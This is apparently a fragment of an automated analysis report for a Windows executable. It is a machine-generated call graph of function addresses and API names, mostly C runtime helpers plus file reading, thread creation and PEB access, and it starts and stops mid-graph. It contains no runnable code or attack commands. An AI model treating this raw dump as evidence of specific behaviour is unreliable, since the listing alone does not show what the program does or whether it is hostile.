API calls 9170->9173 9171->9170 9172->9085 9173->9172 9174->9150 9176 e6424a IsProcessorFeaturePresent 9175->9176 9177 e64249 9175->9177 9179 e649f4 9176->9179 9177->9090 9182 e64ad9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9179->9182 9181 e64ad7 9181->9090 9182->9181 9184 e6dca9 ___vcrt_FlsFree 5 API calls 9183->9184 9185 e6dbb8 9184->9185 9186 e6dbd0 TlsGetValue 9185->9186 9187 e6885b 9185->9187 9186->9187 9187->9097 9187->9098 9187->9105 9189 e6b0cb __freea 14 API calls 9188->9189 9190 e683c4 9189->9190 9190->9105 9224 e6a8c8 9191->9224 9194 e6ab82 9196 e6ab99 9194->9196 9197 e6ab87 GetACP 9194->9197 9195 e6ab70 GetOEMCP 9195->9196 9196->9029 9198 e6bc45 9196->9198 9197->9196 9199 e6bc83 9198->9199 9204 e6bc53 __dosmaperr 9198->9204 9200 e6b757 __strnicoll 14 API calls 9199->9200 9202 e6ad17 9200->9202 9201 e6bc6e RtlAllocateHeap 9201->9202 9201->9204 9202->9032 9202->9033 9203 e67207 __dosmaperr 2 API calls 9203->9204 9204->9199 9204->9201 9204->9203 9206 e6ab4f 50 API calls 9205->9206 9207 e6a96a 9206->9207 9208 e6aa6f 9207->9208 9210 e6a9a7 IsValidCodePage 9207->9210 9211 e6a9c2 std::bad_exception::bad_exception 9207->9211 9209 e64241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9208->9209 9212 e6ab4d 9209->9212 9210->9208 9213 e6a9b9 9210->9213 9264 e6aed9 9211->9264 9212->9037 9212->9041 9213->9211 9214 e6a9e2 GetCPInfo 9213->9214 9214->9208 9214->9211 9217 e6b08a ___scrt_is_nonwritable_in_current_image 9216->9217 9341 e68161 EnterCriticalSection 9217->9341 9219 e6b094 9342 e6ae18 9219->9342 9225 e6a8e6 9224->9225 9231 e6a8df 9224->9231 9226 e6a00a _unexpected 48 API calls 9225->9226 9225->9231 9227 e6a907 9226->9227 9232 e6d95d 9227->9232 9231->9194 9231->9195 9233 e6a91d 9232->9233 9234 e6d970 9232->9234 9236 e6d98a 9233->9236 9234->9233 9240 e6c179 9234->9240 9237 e6d9b2 9236->9237 9238 e6d99d 9236->9238 9237->9231 9238->9237 9261 e6a863 9238->9261 9241 e6c185 ___scrt_is_nonwritable_in_current_image 9240->9241 9242 e6a00a _unexpected 48 API calls 9241->9242 9243 e6c18e 9242->9243 9250 e6c1d4 9243->9250 9253 e68161 EnterCriticalSection 9243->9253 9245 e6c1ac 9254 e6c1fa 9245->9254 9250->9233 9251 e6835d __FrameHandler3::FrameUnwindToState 48 API calls 9252 e6c1f9 9251->9252 9253->9245 9255 e6c1bd 9254->9255 9256 e6c208 __dosmaperr 9254->9256 9258 e6c1d9 9255->9258 9256->9255 9257 e6bfae __dosmaperr 14 API calls 9256->9257 9257->9255 9259 e68178 __FrameHandler3::FrameUnwindToState LeaveCriticalSection 9258->9259 9260 e6c1d0 9259->9260 9260->9250 9260->9251 9262 e6a00a _unexpected 48 API calls 9261->9262 9263 e6a868 9262->9263 9263->9237 9265 e6af01 GetCPInfo 9264->9265 9274 e6afca 9264->9274 9271 e6af19 9265->9271 9265->9274 9267 e64241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9269 e6b07c 9267->9269 9269->9208 9275 e6bced 9271->9275 9273 e6ded4 52 API calls 9273->9274 9274->9267 9276 e6a8c8 __strnicoll 48 API calls 9275->9276 9277 e6bd0d 9276->9277 9295 e6bdee 9277->9295 9279 e6bdc9 9282 e64241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9279->9282 9280 e6bdc1 9298 e6bccd 9280->9298 9281 e6bd3a 9281->9279 9281->9280 9284 e6bc45 15 API calls 9281->9284 9286 e6bd5f __alloca_probe_16 std::bad_exception::bad_exception 9281->9286 9285 e6af81 9282->9285 9284->9286 9290 e6ded4 9285->9290 9286->9280 9287 e6bdee ___scrt_uninitialize_crt MultiByteToWideChar 9286->9287 9288 e6bda8 9287->9288 9288->9280 9289 e6bdaf GetStringTypeW 9288->9289 9289->9280 9291 e6a8c8 __strnicoll 48 API calls 9290->9291 9292 e6dee7 9291->9292 9304 e6df1d 9292->9304 9302 e6be18 9295->9302 9299 e6bcea 9298->9299 9300 e6bcd9 9298->9300 9299->9279 9300->9299 9301 e6b0cb __freea 14 API calls 9300->9301 9301->9299 9303 e6be0a MultiByteToWideChar 9302->9303 9303->9281 9305 e6df38 9304->9305 9306 e6bdee ___scrt_uninitialize_crt MultiByteToWideChar 9305->9306 9310 e6df7c 9306->9310 9307 e6e0f7 9308 e64241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9307->9308 9309 e6afa2 9308->9309 9309->9273 9310->9307 9311 e6bc45 15 API calls 9310->9311 9313 e6dfa2 __alloca_probe_16 9310->9313 9324 e6e04a 9310->9324 9311->9313 9312 e6bccd __freea 14 API calls 9312->9307 9314 e6bdee ___scrt_uninitialize_crt MultiByteToWideChar 9313->9314 9313->9324 9315 e6dfeb 9314->9315 9315->9324 9332 e69c5c 9315->9332 9318 e6e021 9321 e69c5c 6 API calls 9318->9321 9318->9324 9319 e6e059 9320 e6e0e2 9319->9320 9322 e6bc45 15 API calls 9319->9322 9325 e6e06b __alloca_probe_16 9319->9325 9323 e6bccd __freea 14 API calls 9320->9323 9321->9324 9322->9325 9323->9324 9324->9312 9325->9320 9326 e69c5c 6 API calls 9325->9326 9327 e6e0ae 9326->9327 9327->9320 9338 e6d131 9327->9338 9329 e6e0c8 9329->9320 9330 e6e0d1 9329->9330 9331 e6bccd __freea 14 API calls 9330->9331 9331->9324 9333 e69f57 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 9332->9333 9334 e69c67 9333->9334 9335 e69cb9 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 9334->9335 9337 e69c6d 9334->9337 9336 e69cad LCMapStringW 9335->9336 9336->9337 9337->9318 9337->9319 9337->9324 9340 e6d144 ___scrt_uninitialize_crt 9338->9340 9339 e6d182 WideCharToMultiByte 9339->9329 9340->9339 9341->9219 9352 e6a7e2 9342->9352 9344 e6ae3a 9345 e6a7e2 48 API calls 9344->9345 9346 e6ae59 9345->9346 9347 e6ae80 9346->9347 9348 e6b0cb __freea 14 API calls 9346->9348 9349 e6b0bf 9347->9349 9348->9347 9366 e68178 LeaveCriticalSection 9349->9366 9351 e6b0ad 9351->9042 9353 e6a7f3 9352->9353 9357 e6a7ef CatchIt 9352->9357 9354 e6a7fa 9353->9354 9358 e6a80d std::bad_exception::bad_exception 9353->9358 9355 e6b757 __strnicoll 14 API calls 9354->9355 9356 e6a7ff 9355->9356 9359 e67d69 __strnicoll 48 API calls 9356->9359 9357->9344 9358->9357 9360 e6a83b 9358->9360 9362 e6a844 9358->9362 9359->9357 9361 e6b757 __strnicoll 14 API calls 9360->9361 9363 e6a840 9361->9363 9362->9357 9364 e6b757 __strnicoll 14 API calls 9362->9364 9365 e67d69 __strnicoll 48 API calls 9363->9365 9364->9363 9365->9357 9366->9351 9368 e696ba 9367->9368 9370 e696c8 9367->9370 9368->9370 9374 e696e0 9368->9374 9369 e6b757 __strnicoll 14 API calls 9371 e696d0 9369->9371 9370->9369 9372 e67d69 __strnicoll 48 API calls 9371->9372 9373 e696da 9372->9373 9373->8991 9374->9373 9375 e6b757 __strnicoll 14 API calls 9374->9375 9375->9371 9380 e67b5d 9376->9380 9381 e67b7a 9376->9381 9377 e67b74 9379 e6b0cb __freea 14 API calls 9377->9379 9378 e6b0cb __freea 14 API calls 9378->9380 9379->9381 9380->9377 9380->9378 9381->8992 9383 e67da2 9382->9383 9384 e67dca __FrameHandler3::FrameUnwindToState 8 API calls 9383->9384 9385 e67db7 GetCurrentProcess TerminateProcess 9384->9385 9385->8997 9387 e6d30f 9386->9387 9388 e6d320 9387->9388 9391 e6d333 ___from_strstr_to_strchr 9387->9391 9389 e6b757 __strnicoll 14 API calls 9388->9389 9399 e6d325 9389->9399 9390 e6d54a 9392 e6b757 __strnicoll 14 API calls 9390->9392 9391->9390 9393 e6d353 9391->9393 9394 e6d54f 9392->9394 9449 e6d56f 9393->9449 9397 e6b0cb __freea 14 API calls 9394->9397 9397->9399 9398 e6d397 9436 e6d383 9398->9436 9453 e6d589 9398->9453 9399->8949 9400 e6d399 9403 e6b807 __dosmaperr 14 API calls 9400->9403 9400->9436 9401 e6d375 9408 e6d392 9401->9408 9409 e6d37e 9401->9409 9405 e6d3a7 9403->9405 9407 e6b0cb __freea 14 API calls 9405->9407 9406 e6b0cb __freea 14 API calls 9406->9399 9412 e6d3b2 9407->9412 9414 e6d56f 48 API calls 9408->9414 9413 e6b757 __strnicoll 14 API calls 9409->9413 9410 e6d40c 9411 e6b0cb __freea 14 API calls 9410->9411 9420 e6d414 9411->9420 9412->9398 9418 e6b807 __dosmaperr 14 API calls 9412->9418 9412->9436 9413->9436 9414->9398 9415 e6d457 9416 e6d0c4 51 API calls 9415->9416 9415->9436 9417 e6d485 9416->9417 9419 e6b0cb __freea 14 API calls 9417->9419 9421 e6d3ce 9418->9421 9426 e6d441 9419->9426 9420->9426 9457 e6d0c4 9420->9457 9425 e6b0cb __freea 14 API calls 9421->9425 9422 e6d53f 9423 e6b0cb __freea 14 API calls 9422->9423 9423->9399 9425->9398 9426->9422 9426->9426 9429 e6b807 __dosmaperr 14 API calls 9426->9429 9426->9436 9427 e6d438 9428 e6b0cb __freea 14 API calls 9427->9428 9428->9426 9430 e6d4d0 9429->9430 9431 e6d4e0 9430->9431 9432 e6d4d8 9430->9432 9433 e696ac ___std_exception_copy 48 API calls 9431->9433 9434 e6b0cb __freea 14 API calls 9432->9434 9435 e6d4ec 9433->9435 9434->9436 9437 e6d564 9435->9437 9438 e6d4f3 9435->9438 9436->9406 9440 e67d96 __strnicoll 11 API calls 9437->9440 9466 e6f9bc 9438->9466 9442 e6d56e 9440->9442 9443 e6d51a 9445 e6b757 __strnicoll 14 API calls 9443->9445 9444 e6d539 9446 e6b0cb __freea 14 API calls 9444->9446 9447 e6d51f 9445->9447 9446->9422 9448 e6b0cb __freea 14 API calls 9447->9448 9448->9436 9450 e6d57c 9449->9450 9451 e6d35e 9449->9451 9481 e6d5de 9450->9481 9451->9398 9451->9400 9451->9401 9454 e6d59f 9453->9454 9456 e6d3fc 9453->9456 9454->9456 9496 e6f8cb 9454->9496 9456->9410 9456->9415 9458 e6d0d1 9457->9458 9459 e6d0ec 9457->9459 9458->9459 9460 e6d0dd 9458->9460 9461 e6d0fb 9459->9461 9530 e6f6f8 9459->9530 9462 e6b757 __strnicoll 14 API calls 9460->9462 9537 e6f72b 9461->9537 9465 e6d0e2 std::bad_exception::bad_exception 9462->9465 9465->9427 9549 e6c274 9466->9549 9471 e6fa2f 9473 e6fa3b 9471->9473 9475 e6b0cb __freea 14 API calls 9471->9475 9472 e6c274 48 API calls 9474 e6fa0c 9472->9474 9476 e6d514 9473->9476 9478 e6b0cb __freea 14 API calls 9473->9478 9477 e6c30c 17 API calls 9474->9477 9475->9473 9476->9443 9476->9444 9479 e6fa19 9477->9479 9478->9476 9479->9471 9480 e6fa23 SetEnvironmentVariableW 9479->9480 9480->9471 9482 e6d5f1 9481->9482 9483 e6d5ec 9481->9483 9484 e6b807 __dosmaperr 14 API calls 9482->9484 9483->9451 9485 e6d60e 9484->9485 9486 e6d67c 9485->9486 9489 e6d681 9485->9489 9492 e6b807 __dosmaperr 14 API calls 9485->9492 9493 e6b0cb __freea 14 API calls 9485->9493 9494 e696ac ___std_exception_copy 48 API calls 9485->9494 9495 e6d66b 9485->9495 9487 e6835d __FrameHandler3::FrameUnwindToState 48 API calls 9486->9487 9487->9489 9488 e6b0cb __freea 14 API calls 9488->9483 9490 e67d96 __strnicoll 11 API calls 9489->9490 9491 e6d68d 9490->9491 9492->9485 9493->9485 9494->9485 9495->9488 9497 e6f8df 9496->9497 9498 e6f8d9 9496->9498 9497->9454 9499 e701e1 9498->9499 9500 e70199 9498->9500 9512 e701f7 9499->9512 9501 e7019f 9500->9501 9506 e701bc 9500->9506 9503 e6b757 __strnicoll 14 API calls 9501->9503 9505 e701a4 9503->9505 9504 e701af 9504->9454 9507 e67d69 __strnicoll 48 API calls 9505->9507 9508 e6b757 __strnicoll 14 API calls 9506->9508 9511 e701da 9506->9511 9507->9504 9509 e701cb 9508->9509 9510 e67d69 __strnicoll 48 API calls 9509->9510 9510->9504 9511->9454 9513 e70207 9512->9513 9514 e70221 9512->9514 9515 e6b757 __strnicoll 14 API calls 9513->9515 9516 e70240 9514->9516 9517 e70229 9514->9517 9519 e7020c 9515->9519 9518 e7024c 9516->9518 9523 e70263 9516->9523 9520 e6b757 __strnicoll 14 API calls 9517->9520 9522 e6b757 __strnicoll 14 API calls 9518->9522 9524 e67d69 __strnicoll 48 API calls 9519->9524 9521 e7022e 9520->9521 9525 e67d69 __strnicoll 48 API calls 9521->9525 9526 e70251 9522->9526 9527 e6a8c8 __strnicoll 48 API calls 9523->9527 9529 e70217 9523->9529 9524->9529 9525->9529 9528 e67d69 __strnicoll 48 API calls 9526->9528 9527->9529 9528->9529 9529->9504 9531 e6f703 9530->9531 9532 e6f718 HeapSize 9530->9532 9533 e6b757 __strnicoll 14 API calls 9531->9533 9532->9461 9534 e6f708 9533->9534 9535 e67d69 __strnicoll 48 API calls 9534->9535 9536 e6f713 9535->9536 9536->9461 9538 e6f743 9537->9538 9539 e6f738 9537->9539 9541 e6f74b 9538->9541 9547 e6f754 __dosmaperr 9538->9547 9540 e6bc45 15 API calls 9539->9540 9545 e6f740 9540->9545 9542 e6b0cb __freea 14 API calls 9541->9542 9542->9545 9543 e6f77e HeapReAlloc 9543->9545 9543->9547 9544 e6f759 9546 e6b757 __strnicoll 14 API calls 9544->9546 9545->9465 9546->9545 9547->9543 9547->9544 9548 e67207 __dosmaperr 2 API calls 9547->9548 9548->9547 9550 e6a8c8 __strnicoll 48 API calls 9549->9550 9551 e6c286 9550->9551 9553 e6c298 9551->9553 9557 e69a96 9551->9557 9554 e6c30c 9553->9554 9563 e6c4e2 9554->9563 9560 e69f23 9557->9560 9561 e69e9e __dosmaperr 5 API calls 9560->9561 9562 e69a9e 9561->9562 9562->9553 9564 e6c4f0 9563->9564 9565 e6c50a 9563->9565 9581 e6c2f2 9564->9581 9567 e6c530 9565->9567 9568 e6c511 9565->9568 9569 e6bdee ___scrt_uninitialize_crt MultiByteToWideChar 9567->9569 9580 e6c324 9568->9580 9585 e6c2b3 9568->9585 9571 e6c53f 9569->9571 9572 e6c546 GetLastError 9571->9572 9576 e6c2b3 15 API calls 9571->9576 9579 e6c56c 9571->9579 9590 e6b77d 9572->9590 9574 e6bdee ___scrt_uninitialize_crt MultiByteToWideChar 9577 e6c583 9574->9577 9576->9579 9577->9572 9577->9580 9578 e6b757 __strnicoll 14 API calls 9578->9580 9579->9574 9579->9580 9580->9471 9580->9472 9582 e6c2fd 9581->9582 9583 e6c305 9581->9583 9584 e6b0cb __freea 14 API calls 9582->9584 9583->9580 9584->9583 9586 e6c2f2 14 API calls 9585->9586 9587 e6c2c1 9586->9587 9595 e6c255 9587->9595 9598 e6b76a 9590->9598 9592 e6b788 __dosmaperr 9593 e6b757 __strnicoll 14 API calls 9592->9593 9594 e6b79b 9593->9594 9594->9578 9596 e6bc45 15 API calls 9595->9596 9597 e6c262 9596->9597 9597->9580 9599 e6a15b __dosmaperr 14 API calls 9598->9599 9600 e6b76f 9599->9600 9600->9592 9602 e5ce50 std::_Throw_Cpp_error 9601->9602 9620 e63b60 9602->9620 9605 e5ce70 9610 e5ce93 9605->9610 9606 e5d449 9607 e64241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9606->9607 9608 e5cdd5 CreateEllipticRgn 9607->9608 9614 e5d4a0 9608->9614 9609 e5cf87 GetCurrentThreadId 9609->9610 9610->9606 9610->9609 9611 e6441d std::_Throw_Cpp_error 52 API calls 9610->9611 9613 e6441d 52 API calls std::_Throw_Cpp_error 9610->9613 9977 e64952 WaitForSingleObjectEx 9610->9977 9611->9609 9613->9610 9615 e5d4c0 9614->9615 9617 e5d528 9615->9617 9982 e6846b 9615->9982 9618 e64241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9617->9618 9619 e5ce14 9618->9619 9619->8808 9621 e63b8b std::_Throw_Cpp_error 9620->9621 9634 e63cc0 9621->9634 9623 e63b9a 9643 e66ce6 9623->9643 9625 e63bea 9626 e63c84 9625->9626 9628 e63c9a 9625->9628 9658 e63de0 9625->9658 9662 e6441d 9626->9662 9668 e63e30 9628->9668 9632 e64241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9633 e5cdc7 9632->9633 9633->9605 9674 e641c6 9634->9674 9636 e63cef std::_Throw_Cpp_error 9688 e63f00 9636->9688 9641 e64241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9642 e63d32 9641->9642 9642->9623 9644 e66d07 9643->9644 9645 e66cf3 9643->9645 9712 e66d77 9644->9712 9646 e6b757 __strnicoll 14 API calls 9645->9646 9648 e66cf8 9646->9648 9650 e67d69 __strnicoll 48 API calls 9648->9650 9652 e66d03 9650->9652 9651 e66d1c CreateThread 9653 e66d47 9651->9653 9654 e66d3b GetLastError 9651->9654 9729 e66e00 9651->9729 9652->9625 9721 e66dc7 9653->9721 9655 e6b77d __dosmaperr 14 API calls 9654->9655 9655->9653 9659 e63e0c 9658->9659 9660 e64241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9659->9660 9661 e63e19 9660->9661 9661->9625 9663 e64433 std::_Throw_Cpp_error 9662->9663 9869 e6467d 9663->9869 9672 e63e58 std::_Throw_Cpp_error 9668->9672 9669 e63ee3 9670 e64241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9669->9670 9671 e63ca2 9670->9671 9671->9632 9672->9669 9973 e640f0 9672->9973 9677 e641cb 9674->9677 9676 e641e5 9676->9636 9677->9676 9678 e67207 __dosmaperr 2 API calls 9677->9678 9680 e641e7 std::_Throw_Cpp_error 9677->9680 9697 e683c7 9677->9697 9678->9677 9679 e649c1 std::_Throw_Cpp_error 9681 e659fc std::_Throw_Cpp_error RaiseException 9679->9681 9680->9679 9704 e659fc 9680->9704 9683 e649de IsProcessorFeaturePresent 9681->9683 9685 e649f4 9683->9685 9707 e64ad9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9685->9707 9687 e64ad7 9687->9636 9708 e63fb0 9688->9708 9691 e64241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9692 e63d0e 9691->9692 9693 e63f60 9692->9693 9694 e63f95 9693->9694 9695 e64241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9694->9695 9696 e63d22 9695->9696 9696->9641 9703 e6bc45 __dosmaperr 9697->9703 9698 e6bc83 9699 e6b757 __strnicoll 14 API calls 9698->9699 9701 e6bc81 9699->9701 9700 e6bc6e RtlAllocateHeap 9700->9701 9700->9703 9701->9677 9702 e67207 __dosmaperr 2 API calls 9702->9703 9703->9698 9703->9700 9703->9702 9705 e65a43 RaiseException 9704->9705 9706 e65a16 9704->9706 9705->9679 9706->9705 9707->9687 9709 e63fe2 std::_Throw_Cpp_error 9708->9709 9710 e64241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9709->9710 9711 e63f36 9710->9711 9711->9691 9713 e6b807 __dosmaperr 14 API calls 9712->9713 9714 e66d88 9713->9714 9715 e6b0cb __freea 14 API calls 9714->9715 9716 e66d95 9715->9716 9717 e66d9c GetModuleHandleExW 9716->9717 9718 e66db9 9716->9718 9717->9718 9719 e66dc7 16 API calls 9718->9719 9720 e66d13 9719->9720 9720->9651 9720->9653 9722 e66dd3 9721->9722 9728 e66d52 9721->9728 9723 e66de2 9722->9723 9724 e66dd9 CloseHandle 9722->9724 9725 e66df1 9723->9725 9726 e66de8 FreeLibrary 9723->9726 9724->9723 9727 e6b0cb __freea 14 API calls 9725->9727 9726->9725 9727->9728 9728->9625 9730 e66e0c ___scrt_is_nonwritable_in_current_image 9729->9730 9731 e66e13 GetLastError ExitThread 9730->9731 9732 e66e20 9730->9732 9733 e6a00a _unexpected 48 API calls 9732->9733 9734 e66e25 9733->9734 9745 e6b976 9734->9745 9736 e66e3c 9749 e63d40 9736->9749 9746 e66e30 9745->9746 9747 e6b986 __FrameHandler3::FrameUnwindToState 9745->9747 9746->9736 9760 e69cea 9746->9760 9747->9746 9766 e69d93 9747->9766 9750 e63f60 5 API calls 9749->9750 9751 e63d6d std::_Throw_Cpp_error 9750->9751 9769 e640a0 9751->9769 9756 e63e30 5 API calls 9757 e63da6 9756->9757 9758 e64241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9757->9758 9759 e63db5 9758->9759 9763 e66d69 9759->9763 9761 e69e9e __dosmaperr 5 API calls 9760->9761 9762 e69d06 9761->9762 9762->9736 9857 e66e7e 9763->9857 9767 e69e9e __dosmaperr 5 API calls 9766->9767 9768 e69daf 9767->9768 9768->9746 9777 e5cd10 GetPEB 9769->9777 9772 e648cb GetCurrentThreadId 9849 e64c86 9772->9849 9776 e648e4 __Mtx_unlock __Cnd_broadcast 9852 e64c92 9776->9852 9784 e684a7 9777->9784 9782 e64241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9783 e5cd82 9782->9783 9783->9772 9785 e684ba __strnicoll 9784->9785 9799 e68537 9785->9799 9788 e67fd7 __strnicoll 48 API calls 9789 e5cd62 9788->9789 9790 e5c860 9789->9790 9797 e5c890 9790->9797 9792 e5cced 9793 e64241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9792->9793 9795 e5ccf9 9793->9795 9795->9782 9797->9792 9823 e5beb0 CreateFileA 9797->9823 9833 e586c0 9797->9833 9840 e51000 9797->9840 9846 e58ea0 9797->9846 9800 e68567 9799->9800 9801 e68576 9800->9801 9802 e68594 9800->9802 9813 e6856b 9800->9813 9803 e67f12 __strnicoll 29 API calls 9801->9803 9804 e685a1 9802->9804 9808 e684de ___scrt_uninitialize_crt 48 API calls 9802->9808 9803->9813 9805 e685bb 9804->9805 9806 e685d9 9804->9806 9809 e6da19 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9805->9809 9810 e685ed 9806->9810 9811 e68769 9806->9811 9807 e64241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9812 e684cc 9807->9812 9808->9804 9809->9813 9810->9813 9815 e68687 9810->9815 9819 e68631 9810->9819 9811->9813 9814 e6d131 ___scrt_uninitialize_crt WideCharToMultiByte 9811->9814 9812->9788 9813->9807 9814->9813 9816 e6d131 ___scrt_uninitialize_crt WideCharToMultiByte 9815->9816 9818 e6869a 9816->9818 9817 e6d131 ___scrt_uninitialize_crt WideCharToMultiByte 9817->9813 9818->9813 9820 e686b3 GetLastError 9818->9820 9819->9817 9820->9813 9821 e686c2 9820->9821 9821->9813 9822 e6d131 ___scrt_uninitialize_crt WideCharToMultiByte 9821->9822 9822->9821 9825 e5bf29 9823->9825 9824 e5c021 GetFileSize 9824->9825 9825->9824 9826 e5c083 ReadFile 9825->9826 9827 e5c12c CloseHandle 9825->9827 9828 e5c059 CloseHandle 9825->9828 9829 e5c14b 9825->9829 9831 e5c10d CloseHandle 9825->9831 9826->9825 9827->9825 9828->9825 9830 e64241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9829->9830 9832 e5c160 9830->9832 9831->9825 9832->9797 9838 e58783 std::_Throw_Cpp_error 9833->9838 9834 e58dd8 9835 e64241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9834->9835 9836 e58de8 9835->9836 9836->9797 9837 e5e9b0 5 API calls std::_Throw_Cpp_error 9837->9838 9838->9834 9838->9837 9839 e5ea10 51 API calls std::_Throw_Cpp_error 9838->9839 9839->9838 9841 e51041 9840->9841 9842 e57eb0 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9841->9842 9843 e51451 9842->9843 9844 e64241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9843->9844 9845 e57e16 9844->9845 9845->9797 9847 e5d560 std::_Throw_Cpp_error 48 API calls 9846->9847 9848 e58eb6 9847->9848 9848->9797 9855 e651de EnterCriticalSection 9849->9855 9851 e64c90 9851->9776 9856 e651ec LeaveCriticalSection 9852->9856 9854 e63d9e 9854->9756 9855->9851 9856->9854 9858 e6a15b __dosmaperr 14 API calls 9857->9858 9861 e66e89 9858->9861 9859 e66ecb ExitThread 9860 e66ea2 9862 e66eb5 9860->9862 9864 e66eae CloseHandle 9860->9864 9861->9859 9861->9860 9866 e69d25 9861->9866 9862->9859 9865 e66ec1 FreeLibraryAndExitThread 9862->9865 9864->9862 9865->9859 9867 e69e9e __dosmaperr 5 API calls 9866->9867 9868 e69d3e 9867->9868 9868->9860 9870 e64689 __EH_prolog3_GS 9869->9870 9871 e586c0 std::_Throw_Cpp_error 51 API calls 9870->9871 9872 e6469d 9871->9872 9879 e645a6 9872->9879 9897 e642e6 9879->9897 9881 e645d7 9901 e64533 9881->9901 9884 e5d560 std::_Throw_Cpp_error 48 API calls 9885 e645f9 9884->9885 9886 e64241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9885->9886 9887 e64618 9886->9887 9888 e5d560 9887->9888 9889 e5d584 std::_Throw_Cpp_error 9888->9889 9890 e5d6bf std::_Throw_Cpp_error 9889->9890 9970 e5d780 9889->9970 9891 e64241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9890->9891 9892 e5d6f5 9891->9892 9894 e64bd9 9892->9894 9895 e64241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9894->9895 9896 e64be3 9895->9896 9896->9896 9898 e642fe 9897->9898 9900 e64305 CatchIt 9898->9900 9913 e5f980 9898->9913 9900->9881 9902 e6453f __EH_prolog3_GS 9901->9902 9904 e6455e std::_Throw_Cpp_error 9902->9904 9940 e6434e 9902->9940 9905 e6434e std::_Throw_Cpp_error 51 API calls 9904->9905 9906 e64583 9905->9906 9907 e5d560 std::_Throw_Cpp_error 48 API calls 9906->9907 9908 e6458b std::_Throw_Cpp_error 9907->9908 9909 e5d560 std::_Throw_Cpp_error 48 API calls 9908->9909 9910 e6459e 9909->9910 9911 e64bd9 std::_Throw_Cpp_error 5 API calls 9910->9911 9912 e645a5 std::domain_error::domain_error 9911->9912 9912->9884 9915 e5f9a4 9913->9915 9916 e5feac 9915->9916 9920 e5ff00 9915->9920 9928 e60ff0 9915->9928 9917 e64241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9916->9917 9918 e5febc 9917->9918 9918->9900 9926 e5ffa3 9920->9926 9921 e60ff0 21 API calls std::_Throw_Cpp_error 9921->9926 9922 e60642 9923 e64241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9922->9923 9924 e60fc0 9923->9924 9924->9915 9926->9921 9926->9922 9931 e61010 9926->9931 9935 e67d79 9926->9935 9929 e641c6 std::_Throw_Cpp_error 21 API calls 9928->9929 9930 e61007 9929->9930 9930->9915 9932 e6101e std::_Throw_Cpp_error 9931->9932 9933 e659fc std::_Throw_Cpp_error RaiseException 9932->9933 9934 e61036 9933->9934 9936 e6809f __strnicoll 48 API calls 9935->9936 9937 e67d88 9936->9937 9938 e67d96 __strnicoll 11 API calls 9937->9938 9939 e67d95 9938->9939 9941 e6438f 9940->9941 9943 e64365 CatchIt 9940->9943 9944 e6476d 9941->9944 9943->9904 9945 e64792 